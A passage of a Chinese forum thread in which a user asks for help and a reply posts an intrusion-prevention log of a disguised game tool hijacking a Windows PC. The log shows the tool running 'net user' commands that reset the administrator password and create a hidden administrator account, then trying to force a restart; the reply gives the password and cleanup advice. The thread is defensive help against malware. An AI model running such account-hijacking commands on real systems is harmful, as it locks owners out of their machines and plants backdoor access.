飞扬_° 发表于 2014-5-23 18:37 
没人懂吗?求大神了
2014-5-23 18:44:34 创建新进程 允许
进程: c:\windows\explorer.exe
目标: c:\documents and settings\zhou\桌面\鑫哥去除火力英雄.exe
命令行: "C:\Documents and Settings\zhou\桌面\鑫哥去除火力英雄.exe"
规则: [应用程序]*
2014-5-23 18:44:45 创建新进程 允许
进程: c:\documents and settings\zhou\桌面\鑫哥去除火力英雄.exe
目标: c:\windows\system32\net.exe
命令行: net user administrator fyx20010425
规则: [应用程序]*
2014-5-23 18:44:49 创建新进程 允许
进程: c:\windows\system32\net.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*
2014-5-23 18:44:53 创建新进程 允许
进程: c:\documents and settings\zhou\桌面\鑫哥去除火力英雄.exe
目标: c:\windows\system32\net.exe
命令行: net user Q1176298818,30Q币 fyx20010425 /add
规则: [应用程序]*
2014-5-23 18:44:55 创建新进程 允许
进程: c:\windows\system32\net.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*
2014-5-23 18:45:00 创建新进程 允许
进程: c:\documents and settings\zhou\桌面\鑫哥去除火力英雄.exe
目标: c:\windows\system32\net.exe
命令行: net localgroup administrators Q1176298818,30Q币 /add
规则: [应用程序]*
2014-5-23 18:45:02 创建新进程 允许
进程: c:\windows\system32\net.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*
2014-5-23 18:45:06 注销、关机或重新启动系统 阻止
进程: c:\documents and settings\zhou\桌面\鑫哥去除火力英雄.exe
规则: [应用程序]*
密码:fyx20010425
进去把样本删除了,剩下的毒霸强力模式处理一下吧…………以后不要运行这些文件了。
|
置顶卡
